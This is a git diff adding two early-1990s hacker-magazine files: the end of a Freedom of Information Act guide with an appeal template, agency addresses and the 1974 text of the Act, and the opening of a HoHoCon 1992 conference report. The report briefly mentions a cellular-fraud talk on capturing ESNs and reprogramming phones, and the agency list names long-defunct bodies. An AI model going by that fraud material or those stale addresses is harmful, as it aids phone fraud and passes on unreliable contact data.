+altogether.  If through some form of shrewd doublespeak you can think of
+something clever to satisfy this obligation, you can then request huge amounts
+of documents, without paying a cent for them.
+
+Restrictions:
+
+    Of course, there are restrictions to the Freedom of Information Act.  Some
+documentation may be said to be sensitive and out of reach of the public eye.
+Any refusal to grant information through the FOIA may be taken to court, and
+won.  In the act, it states that cases brought up because of the FOIA should
+be put first on the court docket and tried as soon as possible.  Its always
+worth a try.
+
+    When a record contains some information that is withheld, it does not
+necessarily mean that the whole record is exempt.  The federal agency is
+obliged to cut out the portion that is sensitive, and send you the portion it
+can disclose.  The agency must also give you a reason why it cut out this
+portion of the document.
+
+Here are a few of the reasons for exemption:
+
+1) Classified Documents - Classified Documents may be withheld.  The documents
+   may be classified in the interest of national defense and foreign policy.
+   Classified documents may still be requested.  The agency will review the
+   document to determine whether it still needs protection.  If a requested
+   document is already declassified, it can be easily requested.
+
+2) Internal Personal Rules and Practices - This exemption covers matters
+   related to an agency's internal rules and practices.  Requests for Internal
+   schedules, administrative manuals and the like can be refused.
+
+3) Confidential Business Information - Trade secrets or commercially valuable
+   plans do not have to be released.  Commercial or financial information does
+   not also have to be released, as it might hurt an individual.
+
+4) Personal Privacy - This covers personnel, medical, and similar files of
+   which disclosed would interfere with personal privacy.  This exemption has
+   importance because it prevents a commercial business from getting
+   information about you.  At the same time, it allows you to get private
+   information stored about yourself.  This is why it is important to get your
+   letter notarized.
+
+5) Law Enforcement - This allows law enforcement agencies to withhold law
+   enforcement records in order to protect themselves and others.  If there is
+   a trial going on, you can't request your file.  Its smart to get your file
+   from the feds now, while you still can.  Don't wait until you get in some
+   serious shit, and then you don't even know what they have on you!  If you
+   know what they have on you, you know how to fight back.
+
+    If you request does get refused, there is still hope.  If you think that
+under the FOIA's legal terms you deserve to have the document, you can send a
+letter of appeal.  This letter can also be used to argue that their processing
+charge was unfair.  The appeal letter is shown below:
+
+------------------------------------------------------------------------------
+
+Agency Head or Appeal Officer
+Name of Agency
+Address of Agency
+City, State, Zip Code
+
+Re: Freedom of Information Act Appeal
+
+Dear:
+      This is an appeal under the Freedom of Information Act.
+
+    On (date), I requested documents under the Freedom of Information Act.  My
+request was assigned the following identification number: ______.  On (date),
+I received a response to my request in a letter signed by (name of official).
+I appeal the denial of my request.
+
+    [Optional] The documents that were withheld must be disclosed under the
+FOIA because...
+
+    [Optional] I appeal the decision to deny my request for a waiver of fees.
+I believe that I am entitles to a waiver of fees.  Disclosure of the documents
+I requested is in the public interest because the information is likely to
+contribute significantly to public understanding of the operations or
+activities of government and is not primarily in my commercial interest.
+(Provide Details)
+
+    [Optional]  I appeal the decision to require me to pay review costs for
+this request.  I am not seeking this document for commercial use.  (Provide
+Details)
+
+
+    Thank you for your consideration of this appeal.
+
+                      Sincerely,
+
+                      Name
+                      Address
+                      City, State, Zip Code
+                      Telephone Number [Optional]
+------------------------------------------------------------------------------
+
+
+Here is a listing of a few government agencies that hold records on individual
+citizens:
+
+Agriculture
+     Department of Agriculture
+     Washington, D.C. 20250
+
+Air Force
+     Department of the Air Force
+     The Pentagon
+     Washington, D.C. 20330
+
+Alcohol, Drug Abuse, and Mental Health
+     Alcohol, Drug Abuse, and Mental Health Administration
+     5600 Fisher Lane
+     Rockville, Maryland 20857
+
+Alcohol, Tobacco and Firearms
+     Bureau of Alcohol, Tobacco, and Firearms
+     1200 Pennsylvania Avenue, N.W.
+     Washington, D.C. 20226
+
+American Battle Monuments
+     American Battle Monuments Commission:
+     40014 Forrestal Bldg.
+     Washington, D.C. 20314
+
+Appalachian Regional
+     Appalachian Regional Commission:
+     1666 Connecticut Avenue, N.W.
+     Washington, D.C. 20235
+
+Arms Control and Disarmament
+     U.S. Army Control and Disarmament Agency
+     320 21st Street
+     Washington, D.C. 20451
+
+Army
+     Department of the Army
+     The Pentagon
+     Washington, D.C. 20314
+
+Census
+     Bureau of the Census
+     Federal Building 3
+     Washington, D.C. 20233
+
+CIA
+     Central Intelligence Agency
+     Washington, D.C. 20505
+
+Civil Aeronautics
+     Civil Aeronautics Board
+     1825 Connecticut Avenue, N.W.
+     Washington, D.C. 20428
+
+Civil Rights
+     Civil Rights Commission
+     1121 Vermont Avenue, N.W.
+     Washington, D.C. 20425
+
+Civil Service
+     Civil Service Commission
+     1900 E Street, N.W.
+     Washington, D.C. 20415
+
+
+Coastal Plains
+     Coastal Plains Regional Commission
+     1725 K Street, N.W.
+     Washington, D.C. 20006
+
+Commerce
+     Department of Commerce
+     Washington, D.C. 20230
+
+Community Services
+     Community Services Administration
+     1200 19th Street, N.W.
+     Washington, D.C. 20506
+
+Consumer Product Safety
+     Consumer Product Safety Commission
+     1111 18th Street, N.W.
+     Washington, D.C. 20207
+
+Copyright Office
+     Copyright Office
+     Library of Congress
+     Washington, D.C. 20559
+
+Customs Service
+     U.S. Customs Service
+     1301 Constitution Avenue, N.W.
+     Washington, D.C. 20229
+
+Defense
+     Department of Defense
+     The Pentagon
+     Washington, D.C. 20301
+
+Defense Contracts Audits
+     Defense Contracts Audits Agency
+     Cameron Station
+     Alexandria, Virginia 22314
+
+Defense Intelligence
+     Defense Intelligence Agency
+     RDS-3A
+     Washington, D.C. 20301
+
+Defense Investigation
+     Defense Investigative Services
+     D0020
+     Washington, D.C. 20304
+
+Defense Logistical
+     Defense Logistical Agency
+     Cameron Station
+     Alexandria, Virginia, 22314
+
+Defense Mapping
+     Defense Mapping Agency
+     Naval Observatory
+     Washington, D.C. 20305
+
+Disease Control
+     Center for Disease Control
+     Atlanta, Georgia 30333
+
+Economic Development
+     Economic Development Administration
+     Department of Commerce
+     14th & Constitution Avenue, N.W.
+     Washington, D.C. 20230
+
+Education
+     Office of Education
+     400 Maryland Avenue, S.W.
+     Washington, D.C. 20202
+
+Energy
+     Department of Energy
+     U.S. Department of Energy
+     Washington, D.C. 20461
+EPA
+     Environmental Protection Agency
+     401 M Street, S.W.
+     Washington, D.C. 20460
+
+Environmental Quality
+     Council on Environmental Quality
+     722 Jackson Place, N.W.
+     Washington, D.C. 20006
+
+Equal Employment Opportunity
+     Equal Employment Opportunity Commission
+     2401 E Street, N.W.
+     Washington, D.C. 20506
+
+Export-Import Bank
+     Export-Import Bank of the U.S.
+     811 Vermont Avenue, N.W.
+     Washington, D.C. 20571
+
+FAA
+     Federal Aviations Administration
+     800 Independence Avenue, S.W.
+     Washington, D.C. 20591
+
+FBI
+     Federal Bureau of Investigation
+     9th and Pennsylvania Avenue, N.W.
+     Washington, D.C. 20535
+
+FCC
+     Federal Communications Commission
+     1919 M Street, N.W.
+     Washington, D.C. 20554
+
+Federal Elections
+     Federal Election Commission
+     550 17th Street, N.W.
+     Washington, D.C. 20463
+
+Federal Highways
+     Federal Highway Administration
+     400 7th Street, S.W.
+     Washington, D.C. 20590
+
+Federal Power
+     Federal Power Commission
+     825 North Capitol Street
+     Washington, D.C. 20426
+
+Federal Trade
+     Federal Trade Commission
+     6th and Pennsylvania Avenue, N.W.
+     Washington, D.C. 20580
+
+Food and Drug
+     Food and Drug Administration
+     5600 Fisher Lane
+     Rockville, Maryland 20857
+
+Foreign Claims Settlement
+     Foreign Claims Settlement Commission
+     1111 20th Street, N.W.
+     Washington, D.C. 20579
+
+General Accounting
+     General Accounting Office
+     441 G. Street, N.W.
+     Washington, D.C. 20548
+
+General Services
+     General Services Administration
+     18th and F Streets, N.W.
+     Washington, D.C. 20405
+
+Health, Education, and Welfare
+     U.S. Department of Health, Education, and Welfare
+     200 Independence Avenue, S.W.
+     Washington, D.C. 20201
+
+Health Resources
+     Health Resources Administration
+     3700 East West Highway
+     Hyattsville Maryland 20782
+
+Health Services
+     Health Services Administration
+     5600 Fisher Lane
+     Rockville, Maryland 20857
+
+HUD
+     Department of Housing and Urban Development
+     Washington, D.C. 20410
+
+Immigration and Naturalization
+     Immigration and Naturalization Service
+     425 I Street, N.W.
+     Washington, D.C. 20536
+
+Information Agency
+     U.S. Information Agency
+     1750 Pennsylvania Avenue, N.W.
+     Washington, D.C. 20547
+
+Interior
+     Department of the Interior
+     18th and C Street, N.W.
+     Washington, D.C. 20240
+
+IRS
+     Internal Revenue Service
+     1111 Constitution Avenue, N.W.
+     Washington, D.C. 20224
+
+International Development
+     Agency for International Development
+     21st and Virginia Avenue, N.W.
+     Washington, D.C. 20532
+
+International Trade
+     International Trade Commission
+     701 E Street, N.W.
+     Washington, D.C. 20436
+
+ICC
+     Interstate Commerce Commission
+     12th and Constitutional Avenue, N.W.
+     Washington, D.C. 20423
+
+Justice
+     Department of Justice
+     Washington, D.C. 20530
+
+Labor
+     Department of Labor
+     Washington, D.C. 20210
+
+Law Enforcement Assistance
+    Law Enforcement Assistance Administration
+    633 Indiana Avenue, N.W.
+    Washington, D.C. 20230
+
+National Aeronautics and Space
+    National Aeronautics and Space Administration
+    400 Maryland Avenue, S.W.
+    Washington, D.C. 20546
+
+National Archives and Records
+    National Archives and Records Service
+    Washington, D.C. 20408
+
+National Credit Union
+    National Credit Union Administration
+    2025 M Street, N.W.
+    Washington, D.C. 20506
+
+National Endowment for the Arts
+    National Endowment for the Arts
+    806 15th Street, N.W.
+    Washington, D.C. 20506
+
+National Endowment for Humanities
+    National Endowment for Humanities
+    806 15th Street, N.W.
+    Washington, D.C. 20506
+
+National Highway Traffic Safety
+    National Highway Traffic Safety Administration
+    400 7th Street, S.W.
+    Washington, D.C. 20590
+
+National Institute of Education
+    National Institute of Education
+    1200-19th Street, N.W.
+    Washington, D.C. 20208
+
+National Institute of Health
+    National Institute of Health
+    9000 Rockville Pike
+    Rockville, Maryland 20014
+
+National Labor Relations
+    National Labor Relations Board
+    1717 Pennsylvania Avenue, N.W.
+    Washington, D.C. 20570
+
+National Science Foundation
+    National Science Foundation
+    1800 G Street, N.W.
+    Washington, D.C. 20550
+
+National Security Agency
+    National Security Agency
+    Fort George Meade, Maryland 20755
+
+National Security Council
+    National Security Council
+    Old Executive Office Building
+    Washington, D.C. 20506
+
+National Transportation Safety
+    National Transportation Safety Board
+    800 Independence Avenue, S.W.
+    Washington, D.C. 20594
+
+Navy
+    Department of the Navy
+    The Pentagon
+    Washington, D.C. 20350
+
+Nuclear Regulation
+    Nuclear Regulatory Commission
+    Washington, D.C. 20555
+
+
+
+Overseas Private Investment
+    Overseas Private Investment Corporation
+    1129 20th Street, N.W.
+    Washington, D.C. 20527
+
+Postal Service
+    U.S. Postal Service
+    475 L'Enfant Plaza, S.W.
+    Washington, D.C. 20260
+
+Prisons
+    Bureau of Prisons
+    320 First Street, N.W.
+    Washington, D.C. 20534
+
+Public Health
+    Public Health Service
+    200 Independence Avenue, S.W.
+    Washington, D.C. 20201
+
+Secret Service
+    U.S. Secret Service
+    1800 G Street, N.W.
+    Washington, D.C. 20223
+
+Securities and Exchange
+    Securities and Exchange Commission
+    500 North Capitol Street
+    Washington, D.C. 20435
+
+Selective Service
+    Selective Service System
+    600 E Street, N.W.
+    Washington, D.C. 20435
+
+Small Business
+    Small Business Administration
+    1441 L Street, N.W.
+    Washington, D.C. 20416
+
+Social Security
+    Social Security Administration
+    6401 Security Blvd.
+    Baltimore, Maryland 21235
+
+State
+    Department of State
+    Washington, D.C. 20520
+
+Transportation
+    Department of Transportation
+    400 7th Street, S.W.
+    Washington, D.C. 20590
+
+Treasury
+    Department of the Treasury
+    1500 Pennsylvania Avenue, N.W.
+    Washington, D.C. 20220
+
+Urban Mass Transit
+    Urban Mass Transit Administration
+    400 7th Avenue, S.W.
+    Washington, D.C. 20590
+
+Veterans
+    Administration
+    Vermont Avenue, N.W.
+    Washington, D.C. 20420
+
+    Here is a copy of the Freedom of Information Act and all of its
+amendments.  It may prove to have some usefulness.  You might want to read
+through it to understand the law better.  I would not recommend reading it if
+you are in a suicidal state.
+
+------------------------------------------------------------------------------
+
+                   FULL TEXT OF FREEDOM OF INFORMATION ACT,
+                    AS AMENDED IN 1974 BY PUBLIC LAW 93-502
+
+
+% 552  Public Information; agency rules, opinions, orders, records, and
+    proceedings
+  (a) Each agency shall make available to the public information as follows:
+  (1) Each agency shall separately state and currently publish in the Federal
+Register for the guidance of the public-
+      (A) descriptions of its central and field organization and the
+     established places at which, the employees (and in the case of a
+     uniformed service, the members) from whom, and the method whereby, the
+     public may obtain information, make submittals or requests, or obtain
+     decisions;
+      (B) statements of the general course and method by which its functions
+     are channeled and determined, including the nature and requirements of
+     all formal and informal procedures available;
+      (C) rules of procedures, descriptions of forms available or the places
+     at which forms may be obtained, and instructions as to the scope and
+     contents of all papers, reports, or examinations;
+      (D) substantive rules of general applicability adopted as authorized by
+     law, and statements of general policy or interpretations of general
+     applicability formulated and adopted by the agency; and
+      (E) each amendment, revision, or repeal of the foregoing.
+
+Except to the extent that a person has actual and timely notice of the terms
+thereof, a person may not in any manner be required to resort to, or be
+adversely affected by, a matter required to be published in the Federal
+Register and not so published.  For the purpose of this paragraph matter
+reasonably available to the class of persons affected thereby is deemed
+published in the Federal Register when incorporated by reference therein with
+the approval of the Director of the Federal Register.
+  (2) Each agency, in accordance with published rules, shall make available
+for public inspection and copying-
+       (A) final opinions, including concurring and dissenting opinions, as
+     well as orders, made in the adjudication of cases;
+       (B) those statements of policy and interpretations which have been
+     adopted by the agency and are not published in the Federal Register; and
+       (C) administrative staff manuals and instructions to staff that affect
+     a member of the public;
+
+unless the materials are promptly published and copies offered for sale.  To
+the extent required to prevent a clearly unwarranted invasion of personal
+privacy, an agency may delete identifying details when it makes available or
+publishes an opinion, statement of policy, interpretation, or staff manual or
+instruction.  However, inn each case the justification for the deletion shall
+be explained clearly in writing.  Each agency shall also maintain and make
+available for public inspection and copying current indexes providing
+identifying information for the public as to any matter issued, adopted, or
+promulgated after July 4, 1967, and required by this paragraph to be made
+available or published.  Each agency shall promptly, quarterly or more
+frequently, and distribute (by sale or otherwise) copies of each index or
+supplement thereto unless it determines by order published in the Federal
+Register that the publication would be unnecessary and impracticable, in which
+case the agency shall nonetheless provide copies of such index on request at a
+cost not to exceed the direct cost of duplication.  A final order, opinion,
+statement of policy, interpretation, or staff manual or instruction that
+affects a member of the public may be relied on, used, or cited as precedent
+by an agency against a party other than an agency only if-
+      (i) it has been indexed and either made available or published as
+    provided by this paragraph; or
+      (ii) the party has actual and timely notice of the terms thereof.
+  (3) Except with respect to the records made available under paragraphs (1)
+and (2) of this subsection, each agency, upon any request for records which
+(A) reasonably describes such records and (B) is made in accordance with
+published rules stating the time, place, fees (if any), and procedures to be
+followed, shall make the records promptly available to any person.
+  (4)(A) In order to carry out the provisions of this section, each agency
+shall promulgate regulations, pursuant to notice and receipt of public
+comment, specifying a uniform schedule of fees applicable to all constituent
+units of such agency.  Such fees shall be limited to reasonable standard
+charges for documents search and duplication and provide for recovery of only
+the direct costs of such search and duplication.  Documents shall be furnished
+without charge or at a reduced charge where the agency determines that waiver
+or reduction of the fee is in the public interest because furnishing the
+information can be considered as primarily benefiting the general public.
+     (B) On complaint, the district court of the United States in the district
+   in which the complainant resides, or has his principal place of business,
+   or in which the agency records are situated, or in the District of
+   Columbia, has jurisdiction to enjoin the agency from withholding agency
+   records and to order the production of any agency records improperly
+   withheld from the complainant.  In such a case the court shall determine
+   the matter de novo, and may examine the contents of such agency records in
+   camera to determine whether such records or any part thereof shall be
+   withheld under any of the exemptions set forth in subsection (b) of this
+   section, and the burden is on the agency to sustain its action.
+     (C) Notwithstanding any other provision of law, the defendant shall serve
+         an answer or otherwise plead to any complaint made under the
+         subsection within thirty days after service upon the defendant of the
+         pleading i which such complaint is made, unless the court otherwise
+         directs for good cause shown.
+     (D) Except as to cases the court considers of greater importance,
+         proceedings before the district court, as authorized by this
+         subsection, and appeals therefrom, take precedence on the docket over
+         all cases and shall be assigned for hearing and trial or for argument
+         at the earliest practicable date and expedited in every way.
+     (E) The court may assess against the United States reasonable attorney
+         fees and other litigation costs reasonably incurred in any case under
+         this section in which the complainant has substantially prevailed.
+     (F) Whenever the court orders the production of any agency records
+         improperly withheld from the complainant and assesses against the
+         United States reasonable attorney fees and other litigation costs,
+         and the court additionally issues a written finding that the
+         circumstances surrounding the withholding raise we questions whether
+         agency personnel acted arbitrarily or capriciously with respect to
+         the withholding, the Civil Service Commission shall promptly initiate
+         a proceeding to determine whether disciplinary action is warranted
+         against the officer or employee who was primarily responsible for the
+         withholding.  The Commission, after investigation and consideration of
+         the evidence submitted, shall submit its findings and recommendations
+         to the administrative authority of the agency concerned and shall
+         send copies of the findings and recommendations to the officer or
+         employee or his representative.  The administrative authority shall
+         take the corrective action that the Commission recommends.
+     (G) In the event of noncompliance with the order of the court, the
+         district court may punish for contempt the responsible employee, and
+         in the case of a uniformed service, the responsible member.
+  (5)  Each agency having more than one members shall maintain and make
+available for public inspection a record of the final votes of each member in
+every agency proceeding.
+  (6)(A) Each agency, upon any request for records made under paragraph
+(1),(2), or (3) of the subsection, shall-
+       (i) determine within ten days (except Saturdays, Sundays, and legal
+     public holidays) after the receipt of any such request whether to comply
+     with such request and shall immediately notify the person making such
+     request of such determination and the reasons therefor, and of the right
+     of such person to appeal to the head of the agency and adverse
+     determination; and
+       (ii) make a determination with respect to any appeal within twenty days
+     (excepting Saturdays, Sundays, and legal public holidays) after the
+     receipt of such appeal.  If on appeal the denial of the request for
+     records is in whole or in part upheld, the agency shall notify the person
+     making such request of the provisions for judicial review of that
+     determination under paragraph (4) of this subsection.
+     (B) In unusual circumstances as specified in this subparagraph, the time
+  limits prescribed in either clause (i) or clause (ii) of subparagraph (A)
+  may be extended by written notice to the person making such request setting
+  forth the reasons for such extension and the date on which a determination
+  is expected to be dispatched.  NO such notice shall specify a date that
+  would result in an extension for more than ten working days.  As used in
+  this subparagraph, "unusual circumstances" means, but only to the extent
+  reasonably necessary to the proper processing of the particular request-
+       (i) the need to search for and collect the requested records from field
+     facilities or other establishments that are separate from the office
+     processing the request;
+       (ii) the need to search for, collect, and appropriately examine a
+     voluminous amount of separate and distinct records which are demanded in
+     a single request; or
+       (iii) the need for consultation, which shall be conducted with all
+     practicable speed, with another agency having a substantial interest in
+     the determination of the request or among two or more components of the
+     agency having substantial subject-matter interest therein.
+     (C) Any person making a request to any agency for records under paragraph
+  (1), (2), or (3) of this subsection shall be deemed to have exhausted his
+  administrative remedies with respect to such request if the agency fails
+  comply with the applicable time limit provisions of this paragraph.  If the
+  Government can show exceptional circumstances exist and that the agency is
+  exercising due diligence in responding to the request, the court may retain
+  jurisdiction and allow the agency addition time to complete its review of
+  the record.  Upon any determination by an agency to comply with a request
+  for records, the records shall be made promptly available to such person
+  making such request.  Any notification of denial of any request for records
+  under this subsection shall set forth the names and titles or positions of
+  each person responsible for the denial of such request.
+(b) This section does not apply to matters that are-
+(1) (A) specifically authorized under criteria established by an Executive
+ Order to be kept secret in the interest of national defense or foreign policy
+ and (B) are in fact properly classified pursuant to each Executive Order;
+(2) related solely to the internal personnel rules and practices of the
+ agency;
+(3) specifically exempted from disclosure by statute;
+(4) trade secrets and commercial or financial information obtained from a
+ person and privileged or confidential;
+(5) inter-agency or intra-agency memorandums or letters which would not be
+ available by law to a party other than an agency in litigation with the
+ agency;
+(6) personnel and medical files and similar files the disclosure of which
+ would constitute a clearly unwarranted invasion of personal privacy;
+(7) investigatory records compiled for law enforcement purposes, but only to
+ the extent that the production of such records would (A) interfere with
+ enforcement proceeding, (B) deprive a person of a right to a fair trial or an
+ impartial adjudication, (C) constitute an unwarranted invasion of personal
+ privacy, (D) disclose the identity of a confidential source and, in the case
+ of a record compiled by a criminal law enforcement authority in the course of
+ a criminal investigation, or by an agency conducting a lawful national
+ security intelligence investigation, confidential information only furnished
+ by the confidential source, (E) disclose investigative techniques and
+ procedures, or (F) endanger the life or physical safety of law enforcement
+ personnel;
+(8) contained in or related to examination, operating or condition reports
+ prepared by, one behalf of, or for the use of an agency responsible for the
+ regulation or supervision of financial institutions; or
+(9) geological and geophysical information and data, including maps,
+concerning wells.
+
+Any responsible segregable portion of a record shall be provided to any person
+requesting such record after deletion of the portions which are exempt  under
+the subsection.
+  (c) This section does not authorize withholding of information or limit the
+availability of records to the public, except as specifically stated in this
+section.  This section is not authority to withhold information from Congress.
+  (d) On or before March 1 of each calendar year each agency shall submit a
+report covering the preceding calendar year to the Speaker of the House of
+Representatives and President of the Senate for referral to the appropriate
+committees of Congress.  The report shall include-
+  (1) the number of determinations made by such agency not to comply with
+ requests for records made to such agency under subsection (a) and the reasons
+ for each determination;
+  (2) the number of appeals made by persons under subsection (a)(6), the
+ result of such appeals, and the reason for the action upon each appeal that
+ results in a denial of information;
+  (3) the names and titles or positions of each person responsible for the
+ denial of records requested under this section, and the number of instances
+ for participation of each;
+  (4) the results of each proceeding conducted pursuant to subsection
+ (a)(4)(F), including a report of the disciplinary action taken against the
+ officer or employee who was primarily responsible for improperly withholding
+ records or an explanation of why disciplinary action was not taken;
+  (5) a copy of every rule made by such agency regarding this section;
+  (6) a copy of the fee schedule and the total amount of fees collected by the
+agency for making records available under this section; and
+  (7) such other information as indicates efforts to administer fully this
+section.
+
+The Attorney General shall submit an annual report on or before March 1 of
+each calendar year which shall include for the prior year a listing of the
+number of cases arising under this section, the exemption involved in each
+case, the disposition of such case, and the cost, fees, and penalties assessed
+under subsections (a)(4)(E),(F), and (G).  Such report shall also include a
+description of the efforts undertaken by the Department of Justice to
+encourage agency compliance with this section.
+  (e) for purposes of this section, the term "agency" is defined in section
+551(1) of this title includes any executive department, military department,
+Government corporation, Government controlled corporation, or other
+establishment in the executive branch of the Government (including the
+Executive Office of the President), or any independent agency.
+------------------------------------------------------------------------------
+
+In Conclusion:
+
+    The Freedom of Information Act is a powerful tool that can be used to
+benefit yourself and to find out what the feds keep in their log books on you.
+Use it, just don't abuse it.  It gives the individual much power over the
+government.  We no longer have to prove a reason to know the information, but
+we have a right to know the information.  Its the government's job to keep the
+information away from us.  I would also like to mention that regulations and
+all documents that agencies carry can be found in any major library.  This
+will save you cash and frustration.  Anyways, keep the faith, its not that bad
+out there.  And watch comedy central, its good for you.
+
+Greets to:  All the good users on atdt, the works, tlitd.  Stargazer, daemon,
+joker, shadow, the hopeless warez fanatics.  Deranged derelict, jt, and all
+the other virtual friends I forgot.
+
+--------------------------------------------------------------------------------
+ 
diff --git a/phrack42/13.txt b/phrack42/13.txt
new file mode 100644
index 0000000..fb988d6
--- /dev/null
+++ b/phrack42/13.txt
@@ -0,0 +1,1209 @@
+                           ==Phrack Magazine==
+
+               Volume Four, Issue Forty-Two, File 13 of 14
+
+                              HoHoCon 1992
+                               Miscellany
+
+
+
+
+The hackers were getting nervous.  It was understandable.  Just a few weeks
+before HoHoCon and already two other "get-togethers" had experienced
+turbulence from the authorities.
+
+Rumors began to fly that HoHo was to be the next target.  Messages bearing
+ill-tidings littered the underground.  Everyone got worked into a frenzy about
+the upcoming busts at HoHoCon.  People began to cancel their reservations
+while others merely refused to commit one way or the other.
+
+But, amidst all the confusion and hype, many declared "Let them try to
+raid us!  I'm going anyway!"  These were the few, the proud...the stupid.
+
+-------------------------------------------------------------------------------
+
+HoHoCon as I saw it - Erik Bloodaxe (Chris Goggans)
+
+I arrived at the Allen Park Inn in the mid afternoon on Friday the 18th.
+I was promptly greeted by several of my cohorts and a loping transient
+who introduced himself as "Crunchhhhhhhhh."  Yes, John Draper, the infamous
+Captain Crunch had actually ventured outward to attend our little party.
+(Yes, Virginia, the rumors are true:  The Captain is toothless, unkempt,
+overbearing and annoying as all hell.)
+
+I followed Scott Chasin back to our room, the pack of other early arrivals
+in close file behind.  After storing my gear I noticed that Draper was
+looming in the doorway ranting furiously about all the smoking in our room.
+"I've never heard of a hacker who smoked," exclaimed the Captain.
+Taking this as my cue, I bummed a Djarum off of Crimson Death and took great
+glee in adding my fumes to the enveloping fog.
+
+Draper spent the next 30 minutes attempting to eavesdrop on various
+conversations in which various old friends were catching up.  Not knowing
+any of us personally, he nonetheless felt obligated to offer his comments
+about our discussions about life and college and music amidst his coughing
+and complaining about the smoke.
+
+After some time everyone was banished from the room and several of us
+went out to eat.  Scott Chasin, myself, two hackers (The Conflict, & Louis
+Cypher) along with Gary Poole (covering the entire mess for Unix World) took
+off for the nearest grease pit.  Taco Bell won in proximity, and once
+surrounded by burritos Scott, Conflict and I began our rant about Unix
+Security (the lack thereof).  Gary whipped out his Unix World pen and pad
+and began taking notes.  I am uncertain whether or not it was the content
+of our spiel or the asides I repeatedly made regarding the bevy of giggling
+coeds that garnered the most notes in Gary's booklet.
+
+Back at the Con things were spicing up.  More people had begun to arrive
+and the Allen Park Inn staff began to worry about their safety and that of
+their other guests.  One remarked to Jesse (Drunkfux), the sponsor of HoHoCon, "That Draper
+fellow needs to stay out of the lobby.  He was eating large
+amounts of flesh off his hands and it was scaring some of the visitors."
+The staff did not know what to think at all when a father arrived with his
+three sons and after purchasing a room on his credit card told the boys, "Ok
+guys, Mom will be picking you up on Sunday."
+
+This did not concern most of us.  It was straight to the bar
+for us, where Rambone bought Scott & myself a round of Kamikazes.  Also at
+the bar was Bootleg who had just gotten out.  (Of what, and for what you
+can find out on your own.)  Bootleg is probably the smartest biker I have
+ever had the pleasure to meet.  We talked about sex, drugs, hawgs, computers,
+cellular fraud and how close the nearest cabaret was.
+
+A small controversy began to arise amidst the hackers at the bar.  Stationed
+near one end of the room was a table lined with older men.  "FEDS," someone
+murmured, gesturing at the group.
+
+"Good for them," I said, and left the bar to look for Jesse.  When I returned
+several minutes later the hackers had engaged the strangers in conversation
+and found that they weren't feds after all.  Among this group were
+Jim Carter of Houston-based Bank Security, and Bernie Milligan of
+Communications & Toll Fraud Specialists, Inc.  Once this news was out
+tensions eased and everyone continued with their libations.
+
+Suddenly I became aware that there was girl in the room.  I had seen her out
+in the courtyard previously but now she was alone.  Turning on my
+"Leisure Suit Larry" charm I grabbed the seat next to her.  Melissa had arrived
+from Austin to cover the event for Mondo-2000.  She surprised me by telling
+me that she knew who I was, where I worked, and even knew my extension number.
+(I almost fell off the barstool.)
+
+Jim & Bernie came over and joined us at the bar.  Bootleg, Chaoswiz, Melissa
+and I engaged them in wild stories about UFO's, hacking, the NSA & the CIA.
+(Bernie alleged that he was ex-NSA, and Jim ex-CIA.  We have not yet
+determined if they were acting under orders from Col. Jim Beam & Gen. Jack
+Daniels.)
+
+After the ensuing debates on the true formation of the NSA, the group broke up
+and Melissa and I took off to MC Allah's room to partake of the keg he had
+brought.  We walked in the room and were greeted with the sight of a four-foot
+boy with a syringe sticking out of his arm.  This was a bit much, even for me.
+I snatched his "medication" away from him and found that it was really only
+some type of growth hormone.  The boy, 8-Ball, was actually 15 and his parents
+had him on hormones to stimulate his growth.  8-Ball was totally whacked
+out his mind nonetheless.  I think he had ingested such a diverse amount of
+God knows what by the time we arrived that he was lucky to remember where
+he was.  Later that evening he would become convinced that he was Scott
+Chasin and confessed to quite a bit of wrongdoing just before he gave offerings
+at the porcelain alter.
+
+Conversations in the keg room left something to be desired.  One large hacker
+named Tony looked at Melissa and in his best British accent asked if he
+could fondle her breasts.  And the debate between MC Allah and Hunter about
+who could drink the most alcohol reached a climax when both stuck their heads
+under the keg spigot for extended periods of time.
+
+Sometime just before 11:00 the hotel guard, attired in Raiders jacket and
+a really, really big snow hat (the kind with the poofy ball on top) showed
+up brandishing his paper baton, (A rolled up Houston Press).  "You all
+needs to get to yaw roomz, nah.  I ain'tz ta gonna tell yaw no mo'."
+Everyone looked the guard over and moved back into the keg room.  Thus was
+born, "Homie da Guard."  After he wandered away, everyone moved back out
+onto the porch.
+
+It was getting late and I was supposed to speak the next morning so I tried to
+get into our room.  Scott Chasin, hacker extrordinaire, had locked me out.
+After beating on the door for 10 minutes, the windows for 5, the walls for 10,
+and letting the phone ring for another 15 minutes I decided that Scott was a
+bit too tipsy to unlock the door so I crashed out on Jesse's floor.
+
+That night, the water pipes broke.  There was some speculation that those
+evil hackers had "hacked the system."  Not.
+
+While complaining about the lack of water that night, someone overheard
+three young attendees at a bank of pay phones attempting to order up
+a few escorts on "credit."  Rumor has it they were successful.
+
+The next morning was chaos.  By the time we arrived at the conference room
+there were about 150 people inside.  Louis Cypher sat at the door collecting
+money for the raffle and getting everyone to sign the guest book.  Jesse
+and others were setting up various video equipment and getting things
+in order.  In the back of the room, Bernie sat scanning the crowd with a
+super-ear, recording the conversations of those sitting.
+
+Crunch was up in arms again.  "If everyone in here doesn't stop smoking
+I won't be able to do my speech.  If you all want to hear me talk, you
+will have to stop smoking."  Several more cigarettes lit up. After
+speaking with management, Crunch came back in and asked if everyone smoking
+would at least move to one side of the auditorium nearest the door.
+With hesitation, the crowd conceded.
+
+The conference got underway with consultant Ray Kaplan taking a census of
+those in attendance.  The group ranged from under 15 to over 50, had
+professionals and hobbyists, and had enthusiasts for every conceivable
+type operating system.  Ray went on to elaborate on one of his audio
+conferences in which an FBI officer alluded that one of their key
+sources of information was "I.R.C."
+
+Bootleg got up and spoke on the vast potentials involved with cellular
+fraud.  He discussed how to monitor the reverse channel to obtain ESNs,
+and where to obtain the equipment to allow you to do such a thing.  He
+later handed out diskettes (IBM format) containing information on how
+to reprogram cellular phones and where to obtain the equipment necessary
+to pick subscriber numbers out of the air.
+
+Up next, myself and Chasin.  Our topic was a bit obscure and cut deliberately
+short due to concerns about the nature of our speech.  During the Dateline
+NBC piece that featured Chasin a piece of information flashed on the screen
+that alluded to UFO information stored on military computers.  Chasin
+and I had gained possession of the research database compiled by the hackers
+who were looking into this.  We discussed their project, the rumors surrounding
+their findings and the fear surrounding the project.  Not knowing the true
+details of this we declined to comment any further, but made the documentation
+available to anyone who wanted a copy.  We finished our speech by answering
+questions about Comsec, Consultants, etc.
+
+Steve Ryan, a Houston lawyer with a great deal of interest in the
+legal aspects of cyberspace spoke next.  He covered several of the current
+issues affecting the community, spoke on laws in effect, cases pending,
+and gave an insight to his background that led him to focus in on
